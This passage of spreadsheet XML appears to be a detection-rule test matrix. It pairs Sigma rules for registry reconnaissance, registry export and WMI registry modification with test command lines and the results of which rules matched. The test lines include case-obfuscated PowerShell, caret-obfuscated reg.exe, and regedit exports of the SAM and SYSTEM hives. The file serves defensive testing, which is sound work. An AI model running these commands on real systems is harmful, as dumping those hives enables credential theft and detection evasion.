      <c r="J509" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K509" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="510" ht="15.75" customHeight="1" s="42">
      <c r="A510" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B510" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C510" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D510" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E510" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F510" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G510" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H510" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I510" s="43" t="n"/>
      <c r="J510" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K510" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="511" ht="15.75" customHeight="1" s="42">
      <c r="A511" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B511" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C511" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D511" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E511" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F511" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G511" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H511" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I511" s="43" t="n"/>
      <c r="J511" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K511" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="512" ht="15.75" customHeight="1" s="42">
      <c r="A512" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B512" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C512" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D512" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E512" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMANd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F512" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G512" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H512" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I512" s="43" t="n"/>
      <c r="J512" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K512" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="513" ht="15.75" customHeight="1" s="42">
      <c r="A513" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B513" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C513" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D513" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E513" s="36" t="inlineStr">
        <is>
          <t>reg.exe qu^ery "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"</t>
        </is>
      </c>
      <c r="F513" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G513" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H513" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I513" s="36" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J513" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K513" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="514" ht="15.75" customHeight="1" s="42">
      <c r="A514" s="43" t="n"/>
      <c r="B514" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C514" s="36" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D514" s="36" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E514" s="36" t="inlineStr">
        <is>
          <t>regedit.exe /E C:\temp\sam.reg "HKLM\SAM"</t>
        </is>
      </c>
      <c r="F514" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G514" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H514" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I514" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J514" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K514" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="515" ht="15.75" customHeight="1" s="42">
      <c r="A515" s="43" t="n"/>
      <c r="B515" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C515" s="36" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D515" s="36" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E515" s="36" t="inlineStr">
        <is>
          <t>regedit.exe -"E" C:\temp\sam.reg "HKLM\SAM"</t>
        </is>
      </c>
      <c r="F515" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G515" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H515" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I515" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J515" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K515" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="516" ht="15.75" customHeight="1" s="42">
      <c r="A516" s="43" t="n"/>
      <c r="B516" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C516" s="36" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D516" s="36" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E516" s="36" t="inlineStr">
        <is>
          <t>regedit.exe /"E" C:\temp\sam.reg "HKLM\SAM"</t>
        </is>
      </c>
      <c r="F516" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G516" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H516" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I516" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J516" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K516" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="517" ht="15.75" customHeight="1" s="42">
      <c r="A517" s="43" t="n"/>
      <c r="B517" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C517" s="36" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D517" s="36" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E517" s="36" t="inlineStr">
        <is>
          <t>regedit.exe -"E" C:\temp\system.reg HKLM\SYSTEM</t>
        </is>
      </c>
      <c r="F517" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G517" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H517" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I517" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J517" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K517" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="518" ht="15.75" customHeight="1" s="42">
      <c r="A518" s="43" t="n"/>
      <c r="B518" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C518" s="36" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D518" s="36" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E518" s="36" t="inlineStr">
        <is>
          <t>regedit.exe /"E" C:\temp\system.reg HKLM\SYSTEM</t>
        </is>
      </c>
      <c r="F518" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G518" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H518" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I518" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J518" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K518" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="519" ht="15.75" customHeight="1" s="42">
      <c r="A519" s="43" t="n"/>
      <c r="B519" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C519" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D519" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E519" s="36" t="inlineStr">
        <is>
          <t>reg.exe export HKCU\Software C:\temp\export.reg</t>
        </is>
      </c>
      <c r="F519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H519" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I519" s="43" t="n"/>
      <c r="J519" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K519" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="520" ht="15.75" customHeight="1" s="42">
      <c r="A520" s="43" t="n"/>
      <c r="B520" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C520" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D520" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E520" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F520" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G520" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H520" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I520" s="43" t="n"/>
      <c r="J520" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K520" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="521" ht="15.75" customHeight="1" s="42">
      <c r="A521" s="43" t="n"/>
      <c r="B521" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C521" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D521" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E521" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H521" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I521" s="43" t="n"/>
      <c r="J521" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K521" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="522" ht="15.75" customHeight="1" s="42">
      <c r="A522" s="43" t="n"/>
      <c r="B522" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C522" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D522" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E522" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H522" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I522" s="43" t="n"/>
      <c r="J522" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K522" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="523" ht="15.75" customHeight="1" s="42">
      <c r="A523" s="43" t="n"/>
      <c r="B523" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C523" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D523" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E523" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F523" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G523" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H523" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I523" s="43" t="n"/>
      <c r="J523" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K523" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="524" ht="15.75" customHeight="1" s="42">
      <c r="A524" s="43" t="n"/>
      <c r="B524" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C524" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D524" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E524" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMANd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F524" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G524" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H524" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I524" s="43" t="n"/>
      <c r="J524" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K524" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="525" ht="15.75" customHeight="1" s="42">
      <c r="A525" s="43" t="n"/>
      <c r="B525" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C525" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D525" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E525" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F525" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G525" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H525" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I525" s="43" t="n"/>
      <c r="J525" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K525" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="526" ht="15.75" customHeight="1" s="42">
      <c r="A526" s="43" t="n"/>
      <c r="B526" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C526" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D526" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E526" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F526" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G526" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H526" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I526" s="43" t="n"/>
      <c r="J526" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K526" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="527" ht="15.75" customHeight="1" s="42">
      <c r="A527" s="43" t="n"/>
      <c r="B527" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C527" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D527" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E527" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F527" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G527" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H527" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I527" s="43" t="n"/>
      <c r="J527" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K527" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="528" ht="15.75" customHeight="1" s="42">
      <c r="A528" s="43" t="n"/>
      <c r="B528" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C528" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D528" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E528" s="36" t="inlineStr">
        <is>
          <t>regedit.exe /e"C:\temp\export.reg" "HKEY_CURRENT_USER\Software"</t>
        </is>
      </c>
      <c r="F528" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G528" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H528" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I528" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J528" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K528" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="529" ht="15.75" customHeight="1" s="42">
      <c r="A529" s="43" t="n"/>
      <c r="B529" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C529" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D529" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E529" s="36" t="inlineStr">
        <is>
          <t>regedit.exe /"e"C:\temp\export.reg"" "HKEY_CURRENT_USER\Software"</t>
        </is>
      </c>
      <c r="F529" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G529" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H529" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I529" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J529" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K529" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="530" ht="15.75" customHeight="1" s="42">
      <c r="A530" s="43" t="n"/>
      <c r="B530" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C530" s="36" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D530" s="36" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E530" s="36" t="inlineStr">
        <is>
          <t>regedit.exe -"e"C:\temp\export.reg"" "HKEY_CURRENT_USER\Software"</t>
        </is>
      </c>
      <c r="F530" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G530" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H530" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I530" s="36" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J530" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K530" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="531" ht="15.75" customHeight="1" s="42">
      <c r="A531" s="43" t="n"/>
      <c r="B531" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C531" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D531" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E531" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F531" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G531" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H531" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I531" s="43" t="n"/>
      <c r="J531" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K531" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="532" ht="15.75" customHeight="1" s="42">
      <c r="A532" s="43" t="n"/>
      <c r="B532" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C532" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D532" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E532" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H532" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I532" s="43" t="n"/>
      <c r="J532" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K532" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="533" ht="15.75" customHeight="1" s="42">
      <c r="A533" s="43" t="n"/>
      <c r="B533" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C533" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D533" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E533" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H533" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I533" s="43" t="n"/>
      <c r="J533" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K533" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="534" ht="15.75" customHeight="1" s="42">
      <c r="A534" s="43" t="n"/>
      <c r="B534" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C534" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D534" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E534" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H534" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I534" s="43" t="n"/>
      <c r="J534" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K534" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="535" ht="15.75" customHeight="1" s="42">
      <c r="A535" s="43" t="n"/>
      <c r="B535" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C535" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D535" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E535" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H535" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I535" s="43" t="n"/>
      <c r="J535" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K535" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="536" ht="15.75" customHeight="1" s="42">
      <c r="A536" s="43" t="n"/>
      <c r="B536" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C536" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D536" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E536" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H536" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I536" s="43" t="n"/>
      <c r="J536" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K536" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="537" ht="15.75" customHeight="1" s="42">
      <c r="A537" s="43" t="n"/>
      <c r="B537" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C537" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D537" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
